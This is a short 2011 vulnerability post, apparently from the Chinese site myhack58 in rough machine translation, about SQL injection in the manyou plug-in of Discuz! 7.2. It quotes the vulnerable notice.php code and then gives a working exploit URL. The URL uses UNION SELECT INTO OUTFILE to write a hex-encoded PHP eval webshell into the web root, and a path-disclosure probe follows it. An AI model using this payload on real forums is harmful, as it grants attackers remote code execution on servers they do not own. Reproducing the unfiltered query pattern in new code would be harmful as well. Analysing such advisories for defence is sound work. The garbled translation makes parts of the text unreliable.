discuz! 7.2 manyou plug-in storm path and Get Webshell-vulnerability warning-the black bar safety net

2011-06-09T00:00:00
ID MYHACK58:62201130781
Type myhack58
Reporter 佚名
Modified 2011-06-09T00:00:00

Description

|

In the latest discuz! 7.2 comes with a new application plug-manyou is. Precisely in this new plug-in, not the incoming parameters check in GPC is off the case, leading to injection vulnerabilities.

Vulnerability analysis:

File:./ manyou/sources/notice.php

The relevant code:

|

The following is quoted fragment:

if($option == 'del') { $appid = intval($_GET['appid']); $db->query("DELETE FROM {$tablepre}myinvite WHERE appid='$appid' AND touid='$discuz_uid'"); showmessage('manyou:done', 'userapp. php? script=notice&action=invite'); } elseif($option == 'deluserapp') { $hash = trim($_GET['hash']); //here and not filtered, a direct result of the injection of produced if($action == 'invite') { $query = $db->query("SELECT * FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'"); if($value = $db->fetch_array($query)) { $db->query("DELETE FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'"); showmessage('manyou:done', 'userapp. php? script=notice&action=invite'); } else { showmessage('manyou:noperm'); } } else { $db->query("DELETE FROM {$tablepre}mynotice WHERE id='$hash' AND uid='$discuz_uid'"); showmessage('manyou:done', 'userapp. php? script=notice'); } }


Very simple a vulnerability. In the absence of the query results are returned in the case we tend to only take a blind way, but if the current database account have File_priv we can also directly into the outfile to.

/userapp. php? script=notice&view=all&option=deluserapp&action=invite&hash=' union select NULL,NULL,NULL,NULL,0x3C3F70687020406576616C28245F504f53545b274f275d293b3f3e,NULL,NULL,NULL,NULL into outfile 'C:/inetpub/wwwroot/shell.php'%2 3

Proof path:/manyou/admincp. php? my_suffix=%0A%0DTOBY57